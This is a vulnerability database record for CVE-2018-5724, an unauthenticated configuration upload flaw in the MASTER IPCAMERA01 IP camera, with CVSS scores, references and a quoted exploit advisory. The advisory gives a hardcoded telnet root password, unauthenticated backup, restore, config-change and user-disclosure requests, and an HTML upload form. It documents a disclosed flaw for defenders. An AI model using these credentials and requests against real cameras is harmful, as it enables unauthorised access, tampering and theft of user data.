Sign-up

ID

VAR-201801-1647


CVE

CVE-2018-5724


TITLE

MASTER IPCAMERA01 Device unrestricted upload vulnerability type file vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-001497

DESCRIPTION

MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Download and Upload, as demonstrated by restore.cgi. MASTER IPCAMERA01 The device contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MASTER IPCAMERA01 is an IP network camera product. A security vulnerability exists in MASTER IPCAMERA01 version 3.3.4.2103. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities # Date: 17-01-2018 # Remote: Yes # Exploit Authors: Daniele Linguaglossa, Raffaele Sabato # Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726 I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser III REFERENCES ======================================================================== http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

Trust: 1.89

sources: NVD: CVE-2018-5724 // JVNDB: JVNDB-2018-001497 // VULHUB: VHN-135756 // VULMON: CVE-2018-5724 // PACKETSTORM: 145935

AFFECTED PRODUCTS

vendor:barnimodel:master ip camera01scope:eqversion:3.3.4.2103

Trust: 1.6

vendor:barni carlomodel:master ipcamera01scope:eqversion:3.3.4.2103

Trust: 0.8

sources: JVNDB: JVNDB-2018-001497 // CNNVD: CNNVD-201801-571 // NVD: CVE-2018-5724

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-5724
value: CRITICAL

Trust: 1.0

NVD: CVE-2018-5724
value: CRITICAL

Trust: 0.8

CNNVD: CNNVD-201801-571
value: CRITICAL

Trust: 0.6

VULHUB: VHN-135756
value: HIGH

Trust: 0.1

VULMON: CVE-2018-5724
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2018-5724
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-135756
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-5724
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-135756 // VULMON: CVE-2018-5724 // JVNDB: JVNDB-2018-001497 // CNNVD: CNNVD-201801-571 // NVD: CVE-2018-5724

PROBLEMTYPE DATA

problemtype:CWE-434

Trust: 1.9

sources: VULHUB: VHN-135756 // JVNDB: JVNDB-2018-001497 // NVD: CVE-2018-5724

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201801-571

TYPE

lack of information

Trust: 0.6

sources: CNNVD: CNNVD-201801-571

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-001497

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-135756 // 
            
            
            
            VULMON: CVE-2018-5724

PATCH
title:Top Pageurl:http://www.barni.it/
Trust: 0.8
title:Python-CVE-Codeurl:https://github.com/gusrmsdlrh/cve-2018-5724 
Trust: 0.1
sources:
            
            
            VULMON: CVE-2018-5724 // 
            
            
            
            JVNDB: JVNDB-2018-001497

EXTERNAL IDS
db:NVDid:CVE-2018-5724
Trust: 2.7
db:PACKETSTORMid:145935
Trust: 1.2
db:EXPLOIT-DBid:43693
Trust: 1.1
db:JVNDBid:JVNDB-2018-001497
Trust: 0.8
db:CNNVDid:CNNVD-201801-571
Trust: 0.7
db:VULHUBid:VHN-135756
Trust: 0.1
db:VULMONid:CVE-2018-5724
Trust: 0.1
sources:
            
            
            VULHUB: VHN-135756 // 
            
            
            
            VULMON: CVE-2018-5724 // 
            
            
            
            JVNDB: JVNDB-2018-001497 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-571 // 
            
            
            
            NVD: CVE-2018-5724

REFERENCES
url:http://syrion.me/blog/master-ipcam/
Trust: 2.6
url:https://www.exploit-db.com/exploits/43693/
Trust: 1.1
url:https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html
Trust: 1.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724
Trust: 0.9
url:https://nvd.nist.gov/vuln/detail/cve-2018-5724
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5726
Trust: 0.1
url:https://twitter.com/syrion89
Trust: 0.1
url:http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5725
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5723
Trust: 0.1
url:https://twitter.com/dzonerzy,
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Trust: 0.1
sources:
            
            
            VULHUB: VHN-135756 // 
            
            
            
            JVNDB: JVNDB-2018-001497 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-571 // 
            
            
            
            NVD: CVE-2018-5724

CREDITS
Daniele Linguaglossa, Raffaele Sabato
Trust: 0.1
sources:
            
            
            PACKETSTORM: 145935

SOURCES
db:VULHUBid:VHN-135756
db:VULMONid:CVE-2018-5724
db:JVNDBid:JVNDB-2018-001497
db:PACKETSTORMid:145935
db:CNNVDid:CNNVD-201801-571
db:NVDid:CVE-2018-5724

LAST UPDATE DATE
2024-11-23T21:53:28.194000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-135756date:2018-02-05T00:00:00
db:VULMONid:CVE-2018-5724date:2018-02-05T00:00:00
db:JVNDBid:JVNDB-2018-001497date:2018-02-21T00:00:00
db:CNNVDid:CNNVD-201801-571date:2018-01-17T00:00:00
db:NVDid:CVE-2018-5724date:2024-11-21T04:09:15.097

SOURCES RELEASE DATE
db:VULHUBid:VHN-135756date:2018-01-16T00:00:00
db:VULMONid:CVE-2018-5724date:2018-01-16T00:00:00
db:JVNDBid:JVNDB-2018-001497date:2018-02-21T00:00:00
db:PACKETSTORMid:145935date:2018-01-17T03:33:33
db:CNNVDid:CNNVD-201801-571date:2018-01-17T00:00:00
db:NVDid:CVE-2018-5724date:2018-01-16T22:29:00.347